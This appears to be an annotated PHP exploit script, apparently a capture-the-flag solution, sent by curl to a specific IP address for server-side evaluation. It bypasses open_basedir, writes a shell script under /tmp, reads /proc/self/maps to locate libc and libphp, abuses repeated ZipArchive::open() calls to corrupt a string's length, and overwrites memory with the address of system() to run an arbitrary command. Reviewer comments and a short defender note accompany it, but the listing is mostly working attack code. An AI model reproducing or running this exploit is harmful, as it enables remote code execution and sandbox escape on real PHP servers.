// <?php // <- to make GitHub syntax highlighter happy
// Run this with `curl 'http://52.53.55.151:11514/' -F "rce=<exploit.php"`.
// NOTE(review): the opening tag above is commented out, so this listing is not
// directly runnable as a PHP file; the comment says it is submitted as a form
// field named "rce" to a service that presumably evaluates it server-side.
//
// Configuration. Every value below is specific to one target environment
// (libc build, PHP object layout, library paths); nothing in this listing
// validates them beyond the two die() checks further down.
$command = "your command here"; // written verbatim into $script_name as a shell script body (see file_put_contents below)
$system_libc_offset = 0x000000000004f440; // added to libc's mapped base to form $system_addr; tied to one specific libc build
$stdclass_instance_size = 40; // assumed byte size of a stdClass object on this PHP build — used to size the allocations below, TODO confirm
$string_header_size = 32; // assumed zend_string header size; $stdclass_instance_size - $string_header_size = 8 bytes for $memory_view
$script_name = "/tmp/xx"; // must be exactly 7 characters
$good_archive_name = "/tmp/".str_repeat("A", $stdclass_instance_size - 6); // "/tmp/" + 34 'A's = 39 chars, i.e. 40 bytes with NUL — presumably chosen to match $stdclass_instance_size, TODO confirm
$bad_archive_name = "/etc/passwd"; // an existing file that is not a zip archive; see the repeated ZipArchive::open() calls below
$scan_region_length = 500000; // number of byte offsets scanned in the loop at the end of the script
// Attempts to lift the open_basedir restriction at runtime and die()s if the
// final ini_get() does not report "/".
//
// Observable side effects, all visible below: creates the directory /tmp/posos,
// moves the process working directory into it and then two levels up, and
// calls ini_set("open_basedir") twice (first with the relative value "..",
// then with "/"). The ini_get() whose result is discarded is kept as-is; whether
// it matters for the sequence is not evident from this listing.
//
// Defender note: PHP only permits open_basedir to be tightened at runtime; the
// sequence here relies on a relative value being re-resolved after chdir() —
// TODO confirm behaviour against the PHP version in use. Runtime ini_set() of
// open_basedir and directory creation under /tmp from a web request are both
// straightforward audit/detection points. No cleanup of /tmp/posos is performed.
function bypass_openbasedir() {
    chdir("/tmp");
    mkdir("posos");
    chdir("posos");
    ini_set("open_basedir", "..");
    ini_get("open_basedir");
    chdir("..");
    chdir("..");
    ini_set("open_basedir", "/");
    if (ini_get("open_basedir") != "/") die("open_basedir bypass failed");
}
// Returns [start, end] (as integers) of the first executable ("r-xp") mapping
// in /proc/self/maps whose path field equals $lib exactly.
//
// The regex matches one maps line per match (/m), capturing the start and end
// addresses and the final space-separated field, which is compared with $lib
// using ===. If no such mapping exists the function falls off the end and
// returns null; the callers below destructure the result without checking it,
// so a missing or differently named library yields null start/end values.
// Requires /proc/self/maps to be readable by the PHP process; file_get_contents()
// failures are not handled here.
function get_code_address_range($lib) {
    $maps = file_get_contents("/proc/self/maps");
    preg_match_all("/^([0-9a-f]*)-([0-9a-f]*) r-xp .* ([^ ]*)$/m", $maps, $entries, PREG_SET_ORDER);
    foreach ($entries as $entry) {
        if ($entry[3] === $lib) {
            $start = $entry[1];
            $end = $entry[2];
            return array(intval($start, 16), intval($end, 16));
        }
    }
}
// Main sequence. The statements from the first ZipArchive::open() through the
// `new StdClass()` are allocation-order dependent and must not be reordered;
// the later length check on $memory_view is what tells whether that sequence
// had the intended effect.
bypass_openbasedir();
// Artifact: a world-readable/writable/executable shell script at /tmp/xx
// containing $command. It is never removed by this script.
file_put_contents($script_name, "#!/bin/sh\n$command\n");
chmod($script_name, 0777);
// Library paths are hard-coded; on a host where either is missing or named
// differently, get_code_address_range() returns null and both variables
// become null without any error here.
[$libphp_start, $libphp_end] = get_code_address_range("/usr/lib/apache2/modules/libphp8.so");
[$libc_start, $libc_end] = get_code_address_range("/lib/x86_64-linux-gnu/libc-2.27.so");
$system_addr = $libc_start + $system_libc_offset;
// One ZipArchive instance is open()ed three times without an intervening
// close(): first on $good_archive_name, then twice on $bad_archive_name, with an
// 8-byte string ($stdclass_instance_size - $string_header_size) allocated
// between the two opens of the non-archive path, and a stdClass allocated
// afterwards. $instance is never used again; presumably only its allocation matters.
$archive = new ZipArchive();
$archive->open($good_archive_name, ZipArchive::CREATE);
$archive->open($bad_archive_name, ZipArchive::CREATE);
$memory_view = str_repeat("A", $stdclass_instance_size - $string_header_size);
$archive->open($bad_archive_name, ZipArchive::CREATE);
$instance = new StdClass();
// $memory_view was created with length 8, so this check only passes if its
// reported length is now at least $scan_region_length, i.e. the string's
// header has been altered by the preceding steps; otherwise the script stops.
if (strlen($memory_view) < $scan_region_length) die("Exploit failed");
// This stream is opened and closed but never read; its role is not evident
// from the listing — possibly an allocation side effect, TODO confirm.
$f = fopen("php://filter/convert.base64-encode/resource=/etc/passwd", "r");
// Scan $memory_view one byte at a time, reading two machine-order 64-bit
// unsigned values at each offset. Where both fall inside libphp8.so's
// executable mapping, the 16 bytes are overwritten with $script_name plus a
// NUL terminator (8 bytes — hence the "exactly 7 characters" requirement)
// followed by $system_addr packed as a 64-bit value. No bound is applied to
// $offset + $i against the string's actual length, and near the end of the
// region substr() yields fewer than 16 bytes so $fields[2] may be unset.
for ($offset = 0; $offset < $scan_region_length; $offset++) {
    $fields = unpack("Q*", substr($memory_view, $offset, 16));
    if ($fields[1] >= $libphp_start && $fields[1] <= $libphp_end &&
        $fields[2] >= $libphp_start && $fields[2] <= $libphp_end) {
        $payload = "/tmp/xx\x00".pack("Q", $system_addr);
        for ($i = 0; $i < 16; $i++) {
            $memory_view[$offset + $i] = $payload[$i];
        }
    }
}
fclose($f);